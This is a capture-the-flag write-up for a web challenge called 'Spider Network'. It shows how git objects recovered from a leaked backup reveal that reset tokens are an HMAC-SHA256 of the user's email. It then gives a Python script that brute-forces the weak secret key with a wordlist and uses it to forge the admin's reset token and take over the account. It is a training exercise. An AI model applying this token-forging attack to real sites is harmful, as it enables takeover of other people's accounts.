CTFtime.org

Spider Network

by Ox12A0F / th3jackers

Rating: 5.0

We must use the Forgot password feature, let's check it

![forgot_password_check_1](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_4_.png)

![forgot_password_check_2](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_4_.png)

I received an email with a token to reset my password.

I tried doing it again and again.
And guess what? it's the same token every time

![token_email](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_5.png)

So, it must be some kind of a hash of my email, with a constant salt.

We already know the email of the admin ([email protected]), so we just need to find how it is hashed to get the token and
reset his password.

In the home page, there is a link to the [repo](https://github.com/spiders-web/spidersweb) of the challenge. it contains a file `backup.zip` let's extract it

```bash
th3jackers$ unzip backup.zip

Archive: backup.zip
inflating: README.md
creating: static/
creating: static/css/
inflating: static/css/foundation.min.css
inflating: static/css/normalize.css
inflating: static/css/main.css
inflating: static/favicon.ico
creating: static/avatars/
inflating: static/avatars/porkey.jpg
inflating: static/avatars/admin.png
inflating: static/avatars/default-avatar.png
inflating: static/avatars/deadpool.jpg
inflating: static/avatars/peterB.png
inflating: static/avatars/peni.jpg
inflating: static/avatars/miles.jpg
inflating: static/avatars/kingpin.jpg
extracting: static/avatars/gwen.png
creating: views/
inflating: views/index.erb
inflating: views/page_visitor.erb
inflating: views/page_user.erb
extracting: views/not_found.erb
creating: .git/
creating: .git/branches/
creating: .git/hooks/
......
```

There is a `.git` folder, how cool is that :3
And it contains git objects, we can use them to read
old deleted files, using the command `git cat-file OBJECT`

I used this inline command to go through all objects and read them
(Thanks to [this writeup](https://www.mrt-prodz.com/blog/view/2014/09/no-con-name-ctf-quals-2014---miscall-100pts-writeup) for the tip)

```bash
for d in *; do for f in $d/*; do git cat-file -p $d$(basename "$f"); done; done
```

Reading through all the files, i finally found what i was looking for:

```ruby
token = OpenSSL::HMAC.hexdigest("SHA256", ENV["SECRET_KEY"], email)
```

I also found this note:

```
- change SECRET_KEY to something stronger
```

So all what is left to do, it to bruteforce the key by hashing it with HMAC_SHA256 using my email and my token that i already know.

I used `rockyou` as wordlist, here is my python script:

```python
import hashlib,hmac
mytoken="MY_TOKEN"
with open("/usr/share/wordlists/rockyou.txt","rb") as f:
liste = f.readlines()
n=len(liste)
for i in range(len(liste)):
line=liste[i].strip()
if hmac.new(line,"MY_EMAIL",digestmod=hashlib.sha256).hexdigest() == mytoken:
print("FOUND: %s"%line)
break
print("Trying %d/%d"%(i,n))

```

Running it gives us the KEY in few seconds:

```bash
.....
.....
Trying 91398/14344391
Trying 91399/14344391
Trying 91400/14344391
Trying 91401/14344391
Trying 91402/14344391
Trying 91403/14344391
Trying 91404/14344391
FOUND: spiderpig1
````

Let's calculate admin's token now, shall we ?

```python
>>> print(hmac.new("spiderpig1","[email protected]",digestmod=hashlib.sha256).hexdigest())

c1971b6fc5eedfa40d5d96a017b9a439c05f2fe8cdc8d48481e00e0c4580db7d
```

Reset the admin password:

![reset_admin_token](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_6.png)

Et voila

![memehub_flag](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_7.png)

Flag: `shellmates{w3lc0me_2_th3_5pid3r_v3rs3}`

Comments